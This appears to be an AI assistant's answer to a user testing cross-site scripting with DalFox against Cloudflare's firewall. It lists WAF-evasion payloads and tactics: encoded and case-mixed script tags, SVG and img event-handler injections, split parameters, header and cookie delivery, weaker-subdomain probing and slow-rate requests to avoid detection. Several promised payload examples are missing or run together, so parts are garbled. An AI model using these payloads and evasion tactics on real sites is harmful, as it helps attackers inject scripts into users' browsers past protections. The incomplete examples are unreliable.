Bypassing a Web Application Firewall (WAF) for XSS (Cross-Site Scripting) exploits requires a combination of techniques to evade detection mechanisms. Here’s a comprehensive approach to bypass WAFs when testing XSS vulnerabilities, relevant to your scenario with DalFox and Cloudflare WAF.

1. Understand WAF Behavior

Before attempting to bypass:

  • Review server responses: Check how different payloads are filtered or transformed.
  • Identify blocked keywords and patterns: Pay attention to blocked scripts, tags, or common terms like script, onload, and alert.

2. Common XSS Payload Bypass Techniques

1. Character Encoding Variations

Encoding payloads hides the attack vectors from basic filters. Use:

  • Hexadecimal Encoding:
    Example: <script>alert(1)</script>%3Cscript%3Ealert%281%29%3C/script%3E
  • Double URL Encoding:
    Encode twice for deeper filters: %253Cscript%253Ealert%25281%2529%253C/script%253E

2. Case Manipulation

Most WAFs are case-sensitive for keywords.

  • scriptScRiPt
  • onloadOnLoAd

3. Breaking Up Keywords

Inject payloads with character splitting or concatenation.

  • <scr + ipt>alert(1)</scr + ipt>
  • Inject comments or null bytes:
    <scr<!-- -->ipt>alert(1)</scr<!-- -->ipt>

4. HTML Entity Encoding

Obfuscate characters using HTML entities.

  • <script>&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;
  • Payload: &#x3C;svg&#x20;onload&#x3D;alert(1)&#x3E;

5. Alternate Scriptless XSS Payloads

Use techniques that don’t explicitly rely on <script>.

  1. SVG:
    <svg onload="alert(1)">
  2. Image XSS:
    <img src=x onerror=alert(1)>
  3. javascript: URI:
    <a href="javascript:alert(1)">Click me</a>

6. Using Non-Alphanumeric Payloads

Some WAFs filter based on alphanumeric sequences.

  • Example payload using fewer alphabets:

7. JSON-Based and DOM Context Manipulation

If responses use JSON or DOM content, use specific payloads like:



"><svg onload=alert(1)>

8. Bypassing Input Length Restrictions

Split the payload across multiple parameters:

  1. First payload in one parameter: "><
  2. Second payload in another: svg onload=alert(1)>

9. Specific Cloudflare WAF Bypass Strategies

Cloudflare actively monitors payload signatures and behaviors, so:

  1. Randomize or encode payloads:
    • Cloudflare often detects standard payloads like <script>alert(1)</script>.
    • Use obfuscation:
  2. Use alternate event handlers or DOM elements:
    • Instead of onload, try onfocus, onscroll, or onclick.
    • <input autofocus onfocus="alert(1)">
  3. Subdomain-specific bypassing (if WAF rules are not global):
    • Test smaller subdomains or API endpoints where protections are weaker or misconfigured.

10. Double Submission and Cache Poisoning

Bypass restrictions with split payloads over multiple requests:

  1. First request sends benign data (to store in a cache or state variable).
  2. Second request sends a crafted payload that uses the cached value.

11. Using JavaScript Template Literals

For bypassing content filters in JavaScript:


12. Advanced Content Injection

Leverage context-specific injections:

  • Use innerHTML for direct HTML injection vulnerabilities:
    <div id="output"></div>
      document.getElementById("output").innerHTML = "<img src=x onerror=alert(1)>";

13. XSS via UTF-7 Encoding

If character set encoding is poorly configured, attempt UTF-7 payloads:


14. WAF Signature Variants for Cloudflare

When facing Cloudflare’s behavioral analysis:

  • Time-based obfuscation: Send smaller payloads over a longer period to avoid detection based on burst patterns.
  • Alternate delivery vectors:
    Try payloads within different request types:
    • Headers: Referer, User-Agent, X-Forwarded-For
    • Cookies:
      document.cookie = 'alert=1';

Combining Techniques

Most successful bypasses are a combination of methods:

  • Use an encoded payload, case variation, and split elements together:
    <img sRc="x" oNeRroR=alert(1)>

Tools and Resources

  1. DalFox (for XSS discovery): Automate payload discovery.
  2. Burp Suite (manual and automated WAF bypassing): Use extensions like Turbo Intruder for payload injection.
  3. PayloadAllTheThings: Comprehensive repository of payloads.

Closing Thoughts

Bypassing a WAF requires creativity and an understanding of how inputs are sanitized or blocked. An iterative approach using varying payloads, encodings, and delivery methods, combined with detailed analysis of responses, often leads to success.